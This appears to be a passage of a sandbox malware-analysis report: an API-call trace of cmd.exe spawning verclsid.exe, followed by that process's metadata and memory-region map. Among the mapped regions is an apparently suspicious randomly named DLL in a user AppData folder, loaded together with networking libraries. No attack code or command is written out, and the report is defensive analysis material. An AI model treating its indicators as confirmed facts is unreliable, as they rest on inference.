[0382.485] GetStartupInfoW (in: lpStartupInfo=0x232ea0 | out: lpStartupInfo=0x232ea0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0382.485] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x232d78 | out: lpAttributeList=0x0, lpSize=0x232d78) returned 0
[0382.485] GetLastError () returned 0x7a
[0382.485] GetProcessHeap () returned 0x2f0000
[0382.485] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x308600
[0382.486] InitializeProcThreadAttributeList (in: lpAttributeList=0x308600, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x232d78 | out: lpAttributeList=0x308600, lpSize=0x232d78) returned 1
[0382.486] UpdateProcThreadAttribute (in: lpAttributeList=0x308600, dwFlags=0x0, Attribute=0x60001, lpValue=0x232d70, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x308600, lpPreviousValue=0x0) returned 1
[0382.486] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\verclsid.exe", lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x232db0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x232d98 | out: lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessInformation=0x232d98*(hProcess=0x58, hThread=0x54, dwProcessId=0x424, dwThreadId=0x390)) returned 1
[0382.497] DeleteProcThreadAttributeList (in: lpAttributeList=0x308600 | out: lpAttributeList=0x308600)
[0382.497] GetProcessHeap () returned 0x2f0000
[0382.497] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308600 | out: hHeap=0x2f0000) returned 1
[0382.497] GetLastError () returned 0x7a
[0382.497] ResumeThread (hThread=0x54) returned 0x0
[0382.497] CloseHandle (hObject=0x54) returned 1
[0382.498] CloseHandle (hObject=0x58) returned 1
[0382.498] GetConsoleTitleW (in: lpConsoleTitle=0x24f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0382.498] exit (_Code=0)
Process:
id = "17"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x729b8000"
os_pid = "0x424"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "16"
os_parent_pid = "0x194"
cmd_line = "verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2253
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2254
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2255
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2256
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2257
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2258
start_va = 0xff340000
end_va = 0xff346fff
monitored = 0
entry_point = 0xff341b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 2259
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2260
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2261
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2262
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2263
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2264
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2265
start_va = 0x1d0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2266
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2267
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2268
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2269
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2270
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2271
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2272
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2273
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2274
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2275
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2276
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2277
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2278
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2279
start_va = 0x2f0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2280
start_va = 0x3d0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 2281
start_va = 0x4d0000
end_va = 0x657fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 2282
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2283
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2284
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2285
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2286
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 2287
start_va = 0x7f0000
end_va = 0x1beffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2288
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2289
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2290
start_va = 0xd0000
end_va = 0x14cfff
monitored = 0
entry_point = 0xdcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2291
start_va = 0xd0000
end_va = 0x14cfff
monitored = 0
entry_point = 0xdcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2292
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2293
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2294
start_va = 0x2f0000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2295
start_va = 0x3c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 2296
start_va = 0x1bf0000
end_va = 0x1ccefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 2297
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2298
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2299
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2300
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2301
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2302
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2303
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2304
start_va = 0xf0000
end_va = 0x132fff
monitored = 1
entry_point = 0x118ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 2305
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 2306
start_va = 0x7fef78f0000
end_va = 0x7fef78f8fff
monitored = 0
entry_point = 0x7fef78f1070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 2307
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2308
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2309
start_va = 0x1cd0000
end_va = 0x1e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 2310
start_va = 0x1e70000
end_va = 0x1faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 2311
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2312
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2313
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2314
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2315
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2316
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2317
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2318
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2319
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2320
start_va = 0x7fef79b0000
end_va = 0x7fef79b6fff
monitored = 0
entry_point = 0x7fef79b11a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 2321
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 2322
start_va = 0x1fb0000
end_va = 0x227efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2323
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2324
start_va = 0x1cd0000
end_va = 0x1d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 2325
start_va = 0x1df0000
end_va = 0x1e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001df0000"
filename = ""
Region:
id = 2326
start_va = 0x2280000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2327
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 2328
start_va = 0x1d40000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 2329
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 2330
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2331
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2332
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2333
start_va = 0x2280000
end_va = 0x232ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2334
start_va = 0x2340000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 2335
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 2336
start_va = 0x2450000
end_va = 0x24cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002450000"
filename = ""
Region:
id = 2337
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2338
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2346
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2347
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2348
start_va = 0x1f0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2349
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2351
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2352
start_va = 0x2f0000
end_va = 0x2f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 2353
start_va = 0x310000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 2354
start_va = 0x7fef5740000
end_va = 0x7fef62f6fff
monitored = 0
entry_point = 0x7fef5741bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 2355
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2356
start_va = 0x7fef56e0000
end_va = 0x7fef5733fff
monitored = 0
entry_point = 0x7fef56e104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2357
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2358
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 2359
start_va = 0x2580000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2360
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2361
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2362
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2363
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2364
start_va = 0x390000
end_va = 0x39cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2365
start_va = 0x2390000
end_va = 0x240ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 2366
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2367
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2368
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2369
start_va = 0x3a0000
end_va = 0x3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 2370
start_va = 0x1cd0000
end_va = 0x1cf7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 2371
start_va = 0x3b0000
end_va = 0x3b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2372
start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2373
